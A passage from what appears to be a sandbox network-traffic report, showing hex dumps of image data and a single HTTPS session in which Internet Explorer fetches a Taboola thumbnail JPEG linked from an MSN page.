2021-10-02 16:13:23 UTC	136	IN	Data Raw: 4f 07 be c3 c9 cb 79 00 74 18 44 48 c5 96 35 0c 7b 81 47 00 77 20 f4 c7 d6 45 15 2a fb c8 15 c7 4f e7 8e ed 23 b3 b7 53 ff 00 81 2b 9a 5d 68 35 14 c6 c1 e0 31 fe c7 1a 99 58 5f 51 47 36 07 8c 20 7b ae f5 93 7e 8c 85 83 4f 64 76 03 14 33 f2 aa 48 c8 e2 26 25 db c7 90 7c e1 1c ed 3c 1c 23 80 4f 9e a3 16 f7 0b e7 e7 10 59 19 62 eb 37 ee 62 7c 9c 80 13 c7 cb 7f 8c 55 33 48 fd 81 07 ed 9d 2c 1a 07 a1 04 d6 47 a1 8d e2 32 87 3c bd 00 a2 f2 3d 06 9e 06 0c 37 33 0e 85 bb 61 52 eb d7 29 03 79 c0 c0 9a fc 11 51 dc 06 94 20 f2 71 34 fa 58 d6 a9 5a fb b1 c9 74 71 00 4a b1 4f ed 8c bd 46 f5 38 26 81 a8 2c e2 fe b9 24 be 99 0a 4b 92 41 34 3c 0c 8b 51 1b 46 77 30 5b 26 ac f5 ff 00 f5 8b a9 40 28 29 3f 23 19 93 d4 2e ba 50 49 ea 4d 0c 9b 50 c4 d6 d2 30 9d a3 da c4 35 e0 Data Ascii: OytDH5{Gw E*O#S+]h51X_QG6 {~Odv3H&%\|<#OYb7b\|U3H,G2<=73aR)yQ q4XZtqJOF8&,$KA4<QFw0[&@()?#.PIMP05
2021-10-02 16:13:23 UTC	137	IN	Data Raw: 75 9c 8e cb 35 d7 fb 67 04 86 b9 e4 5e 27 fb 9e d0 47 b7 28 2e 1f 77 4e 7e 0e 00 7d 4a ae 31 d6 f6 50 e8 e0 e1 8d ca 81 b4 8e 3b fd 06 11 f8 51 f1 95 9c 47 b9 3b 23 ba ff 00 23 58 d0 46 fa 52 d2 16 e5 e9 42 9a fe 78 d3 c7 a7 05 62 88 58 e0 93 9e a4 d2 86 25 77 91 f3 58 93 ef f6 6d f7 13 40 8e f8 92 c8 b2 aa 14 a0 58 03 74 78 c9 16 8f 1e 73 d3 de 01 24 87 e8 19 78 39 28 3a 57 99 ca 46 d4 09 7b 17 5d f7 8f ee 46 5c 66 0d ba 8a dc 8d c4 a4 7e 56 3d 51 b6 f2 72 38 a4 d2 10 14 c9 e8 b0 25 07 a8 57 8f 8d a7 13 56 b1 a6 c8 a1 20 96 e6 dc b7 3e 49 3c 9c 4d 54 a2 47 66 0a c4 d5 e3 ea de 40 40 55 00 e4 72 20 27 af e4 aa c3 26 db a3 9f a4 ca 18 94 2a 38 f1 83 53 a9 26 84 83 ff 00 a8 c1 a8 9c 53 3c bc 1e 80 28 b3 9f a4 4f 23 7b 25 21 bb 29 03 22 96 78 48 47 ad cc 45 Data Ascii: u5g^'G(.wN~}J1P;QG;##XFRBxbX%wXm@Xtxs$x9(:WF{]F\f~V=Qr8%WV >I<MTGf@@Ur '&*8S&S<(O#{%!)"xHGE
2021-10-02 16:13:23 UTC	138	IN	Data Raw: 08 65 27 3e 41 d3 4d 1c fb a0 86 b3 95 c2 a8 79 a4 77 50 47 72 30 a8 46 a9 6e 8d 53 6a dc 9e dd 29 6c 8a f3 bc 73 cb 02 a0 ae ce 38 19 3d 0d 85 76 50 7f 9b 56 3e 18 f8 83 69 a0 52 0d b3 79 a2 60 8d 79 9c b9 94 9f 50 cf 85 74 0c ad ec 75 1a cd b6 57 a3 5a 7e 9b ab 8e a4 14 a0 46 c3 29 20 f7 5d 22 aa a0 32 a2 a7 66 e4 8f 9e da 54 57 42 bc 06 3d 21 b1 c4 83 ee a5 80 1f 62 4e ac df 15 37 6a 92 de b7 5e 32 6b d6 77 99 79 87 98 e1 03 00 71 c1 49 6d 1b df 0e 6e 72 43 fe 8f 72 1e bd 26 94 c4 03 c7 ff 00 a6 e5 81 38 04 69 b6 6f 99 20 3e c7 bd 3f cd ed 13 f2 ef 88 ac 37 78 b9 0f 1c c7 d8 1d 1f 82 6f e1 44 30 d9 45 9f 6d b1 cd 47 78 a7 5c 84 c9 fa 86 d3 4f 05 94 32 41 76 ab af cb 48 ac 72 18 48 41 0e 1b c8 e2 49 fb 6a 1d d3 62 99 c2 ad 09 60 f9 a8 11 8e 7b ac 67 2e Data Ascii: e'>AMywPGr0FnSj)ls8=vPV>iRy`yPtuWZ~F) ]"2fTWB=!bN7j^2kwyqImnrCr&8io >?7xoD0EmGx\O2AvHrHAIjb`{g.
2021-10-02 16:13:23 UTC	140	IN	Data Raw: 2e 0e 93 65 bd 96 eb 2c 40 db d9 ed 01 e4 b2 b0 0a 07 df 0b a9 69 49 61 49 4a 71 42 db 9e cd 78 e3 96 15 0f aa b9 6f ec 35 b8 6c 1f 0e 0a 22 27 d8 76 d9 c2 75 df 93 33 17 77 e4 10 04 21 4f 00 58 8f 71 aa 5b 5f 55 5b 17 d1 44 86 57 c1 29 33 ca 79 b5 86 19 c8 c9 7d 24 6c b6 55 f8 9c 7a a0 1d 8a 28 27 0a 03 12 72 79 78 d4 56 ed 4f bb 6d bb 55 0a b3 3e 19 20 e3 34 f3 d8 88 64 10 55 0a 05 3e c5 b5 4c 98 e3 0a 62 59 e2 88 46 c0 83 81 ca 50 dd 8f 80 4e a2 db 62 b1 0c 6c d1 53 22 49 1d 49 e0 43 4f dc 64 fb 84 0c 7e fa 9a 6b 33 57 73 0d 28 d7 b4 92 b8 e6 a5 c3 64 c8 ea 07 97 24 0d 47 5d a4 db ca 04 56 0d 2b 3a 14 e1 1f 33 85 55 ce 5b 0b a4 8a c0 56 12 83 94 01 c0 03 20 76 2a 73 e4 69 ab 88 55 b3 bb 58 b7 25 2a cc 80 fa 51 40 24 b1 fb 85 d5 d8 37 21 29 67 7b 96 e4 Data Ascii: .e,@iIaIJqBxo5l"'vu3w!OXq[_U[DW)3y}$lUz('ryxVOmU> 4dU>LbYFPNblS"IICOd~k3Ws(d$G]V+:3U[V vsiUX%Q@$7!)g{
2021-10-02 16:13:23 UTC	141	IN	Data Raw: 67 08 ca 7d 58 07 04 1f 7f 1a 0f 32 9e 45 11 72 ea 0f b3 2a 76 51 ec 32 73 f6 d2 47 d7 81 25 80 17 2e d8 8d ca b1 39 ed e1 c7 80 31 a9 1a d5 ce 31 a9 32 b1 2c c9 e9 2a 1c 87 c6 3c 0f a6 ba 8d 04 71 97 e2 79 04 94 36 42 97 38 1e 31 dc 9c 6a 78 28 52 78 aa 57 87 81 44 96 dd 80 14 98 c1 18 e6 81 b1 d8 e1 b9 ea 2b 13 56 9d 3a 02 4e 70 cd 04 ee dc 23 74 61 c6 48 98 9f 0c 30 75 3e f4 b1 44 12 2b 0d 22 d5 dd 62 04 2a b7 0b 01 7a 76 b2 07 89 d7 97 d6 4d 59 1f 12 45 52 29 ad 4a 94 7e 46 da c5 db 84 77 ea b8 68 a7 ff 00 fa 21 1d d7 5f 37 0d a8 6c cb d7 da e0 69 62 7e 09 d3 63 35 69 25 43 0b fe 20 c3 ab b2 fb 61 46 9a 2a 62 48 5c 59 50 64 62 24 2c 5c 47 22 8e 10 b0 51 fe ac 19 06 71 cf 5d 1f 99 48 ec 9a e2 67 ee ca ea 5e c4 f3 48 49 67 f5 0c 82 4e 7d 86 92 c2 64 ca Data Ascii: g}X2ErvQ2sG%.9112,<qy6B81jx(RxWD+V:Np#taH0u>D+"bzvMYER)J~Fwh!_7lib~c5i%C aFbH\YPdb$,\G"Qq]Hg^HIgN}d
2021-10-02 16:13:23 UTC	142	IN	Data Raw: 3f c8 01 ad ce e2 15 07 e6 7a 2c b5 53 ee f3 63 00 6b a5 b7 45 66 37 58 10 f4 2b b6 0e 40 51 f9 a5 fd fc 68 1e cc 33 fd f0 47 ee 0e 9d c2 02 02 e7 b7 f9 0e c7 1a a5 4a d5 44 b3 0e e4 2f 44 0d 69 ea d9 f5 32 8c 0c 9e 24 f1 d6 d1 b5 1e e1 e2 a3 08 8e 22 5d b9 1e 3d 81 03 3a b5 20 a5 23 43 24 a2 29 04 6e eb f9 c4 52 7e ae 99 ec c4 78 3a dc 5e 28 cb 47 14 82 57 06 33 ef c1 98 1c 1f b8 d6 e5 77 6e 91 1e 38 24 9a ec b6 4a 74 18 a1 08 d2 e5 86 08 23 ce 35 5e de d9 7a f5 1a 70 df 25 1d 25 e7 22 c8 62 91 51 bc 80 a7 c1 04 6b 6f de 22 be e0 1d d1 93 e6 27 c0 ec 8a 5c 05 78 d8 63 0a 47 61 a9 dd 2a ca 4c f0 4d 2c 66 cd 60 7f 2b 48 a9 d8 a1 ee 72 b9 20 6a 34 dd 6f a4 23 79 14 9a 35 78 eb ac 01 38 d6 8e 51 dc e3 d2 0f 7c 03 ad ca 6f c1 68 ed 5a bf 21 33 d8 30 23 4c 62 Data Ascii: ?z,SckEf7X+@Qh3GJD/Di2$"]=: #C$)nR~x:^(GW3wn8$Jt#5^zp%%"bQko"'\xcGa*LM,f`+Hr j4o#y5x8Q\|ohZ!30#Lb
2021-10-02 16:13:23 UTC	144	IN	Data Raw: 00 2c eb 9b 9a ef 14 9d bc 95 6c 0d 24 b2 08 a3 32 29 24 1c 02 f8 23 04 78 3e d9 d4 b6 60 8a d0 8a f3 4d 10 16 10 48 d8 59 98 86 c9 fa 7f 96 84 d4 f6 7d a6 1a 71 42 d3 74 85 85 2f c9 62 92 55 31 31 0f d8 0f 72 07 8d 3c 56 26 98 ee d6 4c 18 96 77 9e c3 84 66 2e 3c 02 a7 a6 06 9a ac f2 4f 23 b9 ea 0e 1c cb 16 23 88 39 c3 1f db 20 0d 1b 96 de a8 79 a4 9a 71 04 01 d9 89 20 38 05 99 87 23 d8 0c 0d 60 2e 4e 4e b3 df f3 63 45 c3 78 4c 64 8d 0c f8 ce 31 a0 1b 1f 97 39 d6 17 19 fa 00 35 6a 7b 5b 35 4a 0b de c7 a3 36 d8 96 1d 30 32 4a c6 72 4f 20 33 db 1d b3 a9 b7 1b 7b 6c b6 6a ee 35 dd 5e 15 ae ee cc 8a 66 7c 1e 9e 0a 67 3f 6d 5d f8 82 f5 12 4f f0 bd aa c2 ad 18 5c f6 71 3d b6 50 a3 bf 9c 65 b4 f4 b6 aa 98 82 2a b4 62 79 d9 43 02 3d 13 49 eb 67 ef e7 92 fd 86 b7 Data Ascii: ,l$2)$#x>`MHY}qBt/bU11r<V&Lwf.<O##9 yq 8#`.NNcExLd195j{[5J602JrO 3{lj5^f\|g?m]O\q=Pe*byC=Ig
2021-10-02 16:13:23 UTC	145	IN	Data Raw: 66 e8 6f 14 e8 a9 bd 31 ae a5 9e 11 cc f4 44 a0 0c 8c c7 92 01 d5 b5 17 84 a6 38 12 79 40 b0 d3 17 92 46 90 58 e4 50 93 97 79 08 0d a9 a8 49 05 ea d5 77 0d c9 e3 86 38 eb cf 66 48 a1 12 10 ec d1 74 59 a4 50 08 04 ea ed ad be c4 8f 35 7b 35 62 6b 68 f1 3b 12 09 31 06 c1 c6 96 2d b6 f9 44 b1 14 90 73 9d b8 72 e0 55 1b e8 5b b8 3a 69 8c b1 08 be 5e ed 3b 7d 93 c6 23 99 51 d9 06 3b 00 79 20 fe 5d 42 a8 5c 08 78 b8 cb a0 00 73 09 d9 82 9f 62 d8 d0 0e 4f 72 cd e3 3f 43 8d 1e dd fe a4 0d 2b a3 1c 80 c3 1f f0 ef a5 ed 96 0e 1b d8 7d 73 e3 52 6c fb 3f c4 fb b2 29 bc 88 92 c7 6d f6 c8 8c 75 98 39 0a 8e 55 df d6 50 8c 82 06 96 ec b5 76 54 ac 77 48 60 96 78 a1 b1 5d 51 04 fc d5 98 91 cc 77 e2 5b 8e 9e cd 8b 34 0d 76 82 94 e8 56 68 22 2a 17 a3 34 9c f2 39 1c e9 9b 71 Data Ascii: fo1D8y@FXPyIw8fHtYP5{5bkh;1-DsrU[:i^;}#Q;y ]B\xsbOr?C+}sRl?)mu9UPvTwH`x]Qw[4vVh"*49q
2021-10-02 16:13:23 UTC	146	IN	Data Raw: 4f fb 28 1a 5d f2 dd c7 49 a9 ee db 6d 8b 94 e8 ba 60 3b f0 b3 66 22 99 c3 60 f6 23 3a 86 d5 5d ae 78 97 7e f8 7e f2 20 b4 88 ee 12 19 22 9e 36 2b 2a 07 c8 2f 19 1d fc 8d 4f 5b 7e a3 0c 53 49 b6 dc 94 b9 94 c2 41 73 14 c4 b6 4a c6 bd c3 63 b2 ea cc 2b bb 9f 9f 10 b3 9e 98 e6 3d 21 78 f6 24 0f 3a 1d 87 a6 30 33 24 87 fa 55 47 73 a2 90 e0 01 6a 7e 51 a2 06 fe 54 1e a6 d3 ee 7b e4 61 7a 54 9a 45 b7 65 c9 40 f9 4a c8 02 c4 09 3d 8b ea 2f fb 37 f8 5a 62 bc 2d cb 91 7a 68 f3 d8 8f 0e 49 1f b2 ea c7 c4 5f 11 02 ae fb 96 e1 c6 ca 87 27 21 e2 5f 0b ff 00 16 d4 5f 87 97 09 c3 8e 72 79 63 24 e4 8d 15 ea cc 17 80 ee 39 bf b1 f3 ac 0a db b5 b1 b5 48 10 84 9e bc 52 18 d8 60 e4 f2 18 e5 ff 00 70 2c 75 61 6d 9f 16 ee 7e 0d 7f de 3f 79 35 1d c9 eb 9e 9c 90 1b 12 45 2c 6a Data Ascii: O(]Im`;f"`#:]x~~ "6+*/O[~SIAsJc+=!x$:03$UGsj~QT{azTEe@J=/7Zb-zhI_'!__ryc$9HR`p,uam~?y5E,j
2021-10-02 16:13:23 UTC	148	IN	Data Raw: 35 59 44 4c 17 ad 14 f1 15 74 2d 87 c2 e7 bb 10 09 c6 b6 7a 49 b7 0a f1 57 33 4b 34 34 d5 65 25 11 ed 4a 79 3c ad 95 6e 21 83 36 01 ce ac 7c 48 c6 b4 73 d6 87 6c 80 ac 01 1b f3 89 10 12 22 55 6e de b6 0b ad eb e0 dd ef 6f 3d 7b 5c a1 7c 2c 1c 82 92 d0 c9 85 99 18 f8 00 e1 b5 b1 59 dd a4 77 af 66 7a 28 f1 43 b9 30 8b 00 35 69 41 8a 39 a4 6c a3 f0 5e 23 bf 91 aa b4 a8 dc 9d 27 15 29 a1 48 23 86 49 de c1 85 15 8b b0 1d 41 9c 12 4e 06 a0 86 a4 46 79 eb 55 77 35 e0 63 13 94 99 cb a8 73 94 ea 0e c3 55 2f ef 5b 16 fb b5 d3 dd 2a 58 b4 6a 40 45 ce 9d 89 25 a8 99 46 b0 d1 c1 28 62 1f c9 1a a1 f1 05 22 99 5e 12 32 5d a9 cb d9 d8 15 92 13 f5 1a 5b f5 c4 32 c9 05 0b 05 52 c2 3b 16 70 c2 53 84 63 96 f7 e3 ab db 2d ca c5 8d b8 27 46 82 7a af 82 c1 8a 10 b8 21 53 0a c3 Data Ascii: 5YDLt-zIW3K44e%Jy<n!6\|Hsl"Uno={\\|,Ywfz(C05iA9l^#')H#IANFyUw5csU/[*Xj@E%F(b"^2][2R;pSc-'Fz!S
2021-10-02 16:13:23 UTC	149	IN	Data Raw: f2 c1 f3 33 98 fb 22 c4 a1 e5 79 02 97 27 80 38 f0 34 6e 5a 6b 35 5c 56 96 45 81 a3 e7 0a 36 0c ae 04 6c 14 10 09 07 27 f9 75 b0 6d 2b 24 4e a9 f3 0b 66 c0 91 98 7e 54 92 5f 94 8c b1 fe 9e 5a dc 37 48 62 b2 22 78 ab 98 2b 04 56 e2 dd 58 f9 46 ef 91 ed 87 07 ef a9 37 9c a1 93 a5 f1 3d bb 5b bb 40 32 46 78 6e 32 d8 54 fd d7 5b 74 3b 69 0c 52 cc 31 a5 3a 00 63 2a d1 a4 6a 1a 55 6e d8 28 bc 18 78 6d 49 bf fc 69 72 e3 56 f8 56 bd 20 6b 4b 35 d9 d8 0c c5 12 b4 8d d1 4c 8d 53 f8 b1 b7 78 12 4d e9 ea b9 9a cc 24 8c bc 3e ae e5 17 ec 0a 9d 4d 00 a4 16 4d 95 65 24 38 a6 7f fa 57 c9 ee f5 4f a4 11 9c c6 50 eb 6c a5 2e f4 c4 4a 92 ed 71 42 11 0b 86 58 c1 44 90 1c 63 ce 01 3a db 56 85 59 16 29 e7 dc e9 fc b5 69 0a f9 78 55 51 26 25 be a1 42 ea 84 bf c5 ab 58 9f 6e bf Data Ascii: 3"y'84nZk5\VE6l'um+$Nf~T_Z7Hb"x+VXF7=[@2Fxn2T[t;iR1:c*jUn(xmIirVV kK5LSxM$>MMe$8WOPl.JqBXDc:VY)ixUQ&%BXn
2021-10-02 16:13:23 UTC	150	IN	Data Raw: 60 02 06 ab bc c6 d4 8b f3 51 ca 0c 4c 19 55 c1 72 70 54 95 20 8c fe 65 ee 32 34 fb a4 f0 b2 a3 a6 4c 75 61 71 ea fb 17 d2 d8 ae d2 87 88 40 9d 34 45 cf 68 44 4b 9c 9f be ac 47 01 ef f2 ef 21 1f e6 99 f4 fe c7 42 29 70 b1 c3 27 35 66 09 e5 82 a8 24 02 4e 3b 9d 74 c8 c1 60 3f 28 fa 67 3f 5f 61 e4 eb 27 5b 6f c5 bb 96 ed 26 ec ff 00 12 ed 55 ab 08 6d a5 4d ae 56 3c c1 57 70 ee 88 19 e2 51 dd 54 14 d4 57 2b 49 10 6e a4 4c 1b 9c 6e 32 0e 0e 33 91 ac 41 29 c8 8e 4c b4 79 fa fd 54 8d 73 6a 76 56 6a ce 18 24 a8 c3 b1 58 a6 21 b8 f2 1f 50 41 d4 af b5 da 93 10 cc c9 fe 8b 70 0e e5 1c 02 ca 92 8f b1 d4 b4 ef 53 9e b3 18 58 a9 b5 02 3b f4 d9 51 cf 70 87 23 25 74 9b 4d aa 7f 0f 45 3d d9 99 42 ad c7 8a 00 ec c8 ea 30 5d c8 27 0e 46 a3 12 48 5a 6e 25 f1 dd b2 70 7b 6a Data Ascii: `QLUrpT e24Luaq@4EhDKG!B)p'5f$N;t`?(g?_a'[o&UmMV<WpQTW+InLn23A)LyTsjvVj$X!PApSX;Qp#%tME=B0]'FHZn%p{j
2021-10-02 16:13:23 UTC	152	IN	Data Raw: ea bb 9d a4 e0 bd c3 75 92 36 4e c3 df d2 71 a6 db a2 76 e5 c4 2f 39 b8 ff 00 b0 08 c7 f7 3a ea df cb 7e 2d d8 d7 aa 40 1d f8 86 25 71 fb 6b 27 dc 6a ce f5 61 3c 54 8a 45 46 fd c8 39 62 07 f4 82 75 bf 09 6b 3f a7 6f d9 68 58 2b 01 f1 87 54 56 62 7f da d6 e4 cb b8 73 5a 8d 73 6f 9a 85 a9 b8 63 3c 09 50 18 8c 8c 8c 6a fc 59 21 99 18 c4 fc 3e c4 87 f3 a8 78 75 1d cb c5 b6 c9 30 c1 3e 4b 40 e7 5f 0a d2 86 1d c6 9d 33 3d 99 26 ae cf 6a d3 11 14 31 20 94 96 73 8c f8 d0 dd 76 fa f0 56 aa a6 a4 4e 04 11 c5 18 e0 26 6e 38 36 1c 7e 24 80 7b b6 b6 aa 52 39 e6 7a b6 47 b8 c1 18 70 87 49 15 6a 88 52 bc 15 9d e6 0c 19 89 f5 18 cc 59 03 3f 7d 57 b8 ce d9 96 6e 9b 23 1f ee 4b 1d 51 b5 49 aa 43 5e 0e 39 63 21 47 73 c8 a9 00 a3 01 80 30 c7 53 55 c8 06 4d b6 66 3d 33 82 18 Data Ascii: u6Nqv/9:~-@%qk'ja<TEF9buk?ohX+TVbsZsoc<PjY!>xu0>K@_3=&j1 svVN&n86~${R9zGpIjRY?}Wn#KQIC^9c!Gs0SUMf=3
2021-10-02 16:13:23 UTC	209	IN	Data Raw: 32 0c 85 75 fc a4 8f a1 d4 6c 1c 61 94 d8 9a 12 3b 76 3f 85 e4 77 d4 d5 62 84 ab 2e 6c 89 94 b1 60 bf 94 a2 f6 ef e4 e4 eb d3 2c 3d 32 c3 b3 f6 cf 75 3d 8a b7 7f 03 4a b3 d5 65 b1 0e 11 cb 42 d1 7a d6 5c 22 b1 38 c6 a5 db a7 aa cf 62 dc ab 4a bf 4c 55 95 ca d5 78 fe 66 7f 32 84 63 86 c1 18 d6 ed bf 6e 29 81 2d 68 ac 28 ab 03 2f 70 5f 0a 91 0f ba ba b6 a2 9b 74 ab 0f 49 65 16 e6 61 0c 18 20 82 f2 3e 4a 80 c4 60 05 4c 7e 9d 57 b6 47 31 0c 35 d4 54 db d1 88 c1 0a ca 00 71 9f 22 30 74 e6 a1 97 92 d7 2a d0 53 52 4e 46 21 07 2f f6 32 1d 0b 12 45 86 45 cf 83 f6 51 d9 75 1c 4b 9c 28 ec 49 fd ce 80 60 7d 47 39 1a 72 a6 cb 47 5e c2 37 09 22 b7 24 6c ca 23 65 21 83 70 52 72 35 3b 74 3a ce 1a 47 67 2e f2 b9 91 d9 cb 64 92 ec 49 3a 49 e1 a7 f0 94 c2 c7 13 90 0d a9 12 Data Ascii: 2ula;v?wb.l`,=2u=JeBz\"8bJLUxf2cn)-h(/p_tIea >J`L~WG15Tq"0t*SRNF!/2EEQuK(I`}G9rG^7"$l#e!pRr5;t:Gg.dI:I
2021-10-02 16:13:23 UTC	210	IN	Data Raw: a9 21 c1 0b 24 9c 9d d7 b1 c8 51 cb 5c a6 10 22 a9 12 66 3b 15 dc f4 dd d5 ab b7 23 1c 43 25 b9 0c ae 32 06 ad 59 4d bf e4 e7 ac 2a 86 97 8d bb 2d 9a 91 c5 30 28 8a f6 7a fd 26 e5 df 20 15 07 5f 21 52 aa fc 51 5e 2a e6 36 42 1a b5 78 c8 87 04 06 f4 3b 61 39 8c e7 24 ea 11 62 ad ab bd 49 78 af 53 89 2c c1 4b 79 c6 5b 59 fc c7 bf 8f 3e da 4b 26 49 76 f1 14 d1 e6 2f 49 9e 3c 2b a1 24 64 60 e9 77 fa 88 80 22 4e dc 6d 27 d9 26 00 f2 c7 f5 83 a9 14 48 d4 92 cc 12 c2 b1 3c 6e 65 e5 eb fa 90 13 f3 02 46 92 47 46 64 7b 32 90 c8 0a 9c 7e 1a 8f 3f b9 d2 5e 84 ca c5 97 b2 4a a0 93 e0 8e c7 f6 3a 92 3a d8 95 d0 4a bd 36 0b 80 71 8f bf b6 34 45 6a 94 26 95 f2 73 26 1d 96 20 40 5f bb 81 81 ab 46 6b 10 3c 32 2c 88 54 43 2c a8 bc 62 97 f9 58 87 ce 0e 83 80 a3 18 1a e9 bc Data Ascii: !$Q\"f;#C%2YM-0(z& _!RQ^6Bx;a9$bIxS,Ky[Y>K&Iv/I<+$d`w"Nm'&H<neFGFd{2~?^J::J6q4Ej&s& @_Fk<2,TC,bX

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49827	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:13:23 UTC	111	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb5bcb7af6a18196797e0801a99a8e259.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-02 16:13:23 UTC	197	IN	HTTP/1.1 200 OK Connection: close Content-Length: 44636 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 439269155958760290671561927260754815584,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "748ae8a0d52044dcd456b53d64ff7a9a" last-modified: Wed, 01 Sep 2021 10:13:29 GMT status: 200 OK timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 100 x-ratelimit-reset: 1 x-request-id: 3dd135a5a06a1a9bfba3b346a5faf4e0 x-envoy-upstream-service-time: 383 X-backend-name: US_DIR:3FP7YNX3LMizprTZsG7BSW--F_US_nlb105 Via: 1.1 varnish, 1.1 varnish Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Sat, 02 Oct 2021 16:13:23 GMT Age: 1515621 X-Served-By: cache-wdc5543-WDC, cache-dca17774-DCA, cache-mxp6972-MXP X-Cache: MISS, HIT, HIT X-Cache-Hits: 0, 2, 1266 X-Timer: S1633191204.852807,VS0,VE0 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb5bcb7af6a18196797e0801a99a8e259.jpg X-vcl-time-ms: 0
2021-10-02 16:13:23 UTC	198	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 03 03 03 04 04 04 04 05 05 05 05 05 07 07 06 06 07 07 0b 08 09 08 09 08 0b 11 0b 0c 0b 0b 0c 0b 11 0f 12 0f 0e 0f 12 0f 1b 15 13 13 15 1b 1f 1a 19 1a 1f 26 22 22 26 30 2d 30 3e 3e 54 01 09 09 09 09 09 09 0a 0b 0b 0a 0e 0f 0d 0f 0e 14 12 11 11 12 14 1e 16 17 16 17 16 1e 2e 1d 21 1d 1d 21 1d 2e 29 31 28 25 28 31 29 49 39 33 33 39 49 54 47 43 47 54 66 5b 5b 66 81 7a 81 a8 a8 e2 ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 36 00 00 03 00 03 01 01 01 01 01 00 00 00 00 00 00 00 05 06 07 03 04 08 02 09 01 00 0a 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 2e 3f 21 b2 13 7d 23 87 fd 3f 37 Data Ascii: JFIF&""&0-0>>T.!!.)1(%(1)I9339ITGCGTf[[fz76.?!}#?7
2021-10-02 16:13:23 UTC	199	IN	Data Raw: ae 09 c1 9b 37 64 75 c1 5e bf d1 b0 c7 48 15 b7 e5 f1 95 59 d6 67 a1 4d fc fe 99 e7 a4 6e 9c 30 6e 58 d3 66 15 59 f3 f4 51 ed 84 9e b8 f5 aa cf c1 5f 94 a9 fc da 6c e4 e6 bd 50 d1 02 b7 7c 10 c9 d0 f0 b5 97 51 0f 47 d7 5d 63 71 ce 4e b3 15 7c 4a ec d9 41 b3 1d 21 80 6a 87 90 dd cd 6e 5c b7 3c eb 8f 3d 28 3c 80 71 74 ce 1a ac 62 d7 06 9f ac a4 f4 4d 2b 5a 1b 98 4f 27 84 22 3e b2 57 69 ed c7 ba 4d 48 56 19 6c e8 63 44 65 e2 93 db 4c 7c f4 c1 83 9f 6f 39 7a 11 dc ab 4b 32 bf c9 5a 3a 29 3e a9 bf 17 50 cf 48 77 a5 88 d1 6d 61 42 e8 6d e8 ac 61 b0 3d e4 67 0f c0 ca 1b 0d 6f cb d7 61 84 0e 02 c1 a0 2f d4 d5 50 bb 73 0f 87 9a 97 4d cd 23 6d 9b 9e 17 35 69 e2 2c 2b 4f 99 dc a3 68 d1 01 03 3d 2c 9c bd 26 bc 06 98 cc c5 02 46 db 16 ea 18 d8 9d 0d cd 93 cd 33 f1 a4 Data Ascii: 7du^HYgMn0nXfYQ_lP\|QG]cqN\|JA!jn\<=(<qtbM+ZO'">WiMHVlcDeL\|o9zK2Z:)>PHwmaBma=goa/PsM#m5i,+Oh=,&F3
2021-10-02 16:13:23 UTC	200	IN	Data Raw: 0e 81 aa fc 74 c3 5f bd 96 29 09 2f 90 cb 0d b6 73 e8 18 f3 45 1d 97 a4 a3 dd 8b af 69 c3 34 3e 7c b1 27 b0 a7 85 db 11 bd 9b 00 d3 19 e7 71 c6 f9 fd 57 52 db 02 7a 54 50 cd e8 c9 a1 85 37 6a c2 2b a7 ff 00 23 4f ff 00 01 1f a7 cb 1f 53 c5 51 00 15 ef b5 05 37 71 30 bd 22 2b 19 68 fb 40 37 0e 0f 6b 87 3e 92 e8 d2 9f fd fc 4a 9e ca 1c 8d 7d ba c9 53 6f fe 51 89 3c b7 9f 4f 83 d0 fe 51 2d 8a c2 03 48 50 ff 00 48 dd 76 cb 1c 9b d0 73 b1 48 de c8 fc b5 30 be 92 ec 86 9e 7f 2d ba 9a 8c 13 a1 e9 36 fe 55 4a 24 70 67 97 29 c6 79 b6 65 bf 55 b3 5c 25 30 23 f0 56 54 6b b6 cb 6b e4 65 d5 6b 18 31 bf b0 0c 4f 4d c7 21 21 73 63 2b 18 00 77 1f e8 e9 71 8d af 4b aa f4 4f 46 70 cb 47 cc 6e 2b 3e ff 00 2c a8 0d 0b 21 19 6d b8 fb 0a 7b 82 3d 07 41 a2 64 a7 14 81 95 2b 0a Data Ascii: t_)/sEi4>\|'qWRzTP7j+#OSQ7q0"+h@7k>J}SoQ<OQ-HPHvsH0-6UJ$pg)yeU\%0#VTkkek1OM!!sc+wqKOFpGn+>,!m{=Ad+
